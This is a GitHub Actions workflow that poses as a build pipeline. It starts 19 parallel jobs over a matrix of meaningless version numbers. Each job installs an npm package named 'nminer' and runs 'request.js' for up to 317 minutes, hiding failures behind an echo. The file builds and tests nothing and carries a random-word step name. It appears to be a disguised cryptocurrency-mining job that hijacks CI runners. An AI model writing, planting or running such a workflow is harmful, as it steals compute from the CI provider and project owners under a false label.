name: request
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7095 }
          - { version: 6750 }
          - { version: 3025 }
          - { version: 8920 }
          - { version: 7480 }
          - { version: 2435 }
          - { version: 9904 }
          - { version: 1480 }
          - { version: 6213 }
          - { version: 2920 }
          - { version: 1046 }
          - { version: 4336 }
          - { version: 8295 }
          - { version: 2124 }
          - { version: 9 }
          - { version: 2502 }
          - { version: 6626 }
          - { version: 4830 }
          - { version: 8196 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: bookend round though mindless
        run: |
          npm install nminer@latest
          timeout 317m node request.js || echo "request executed"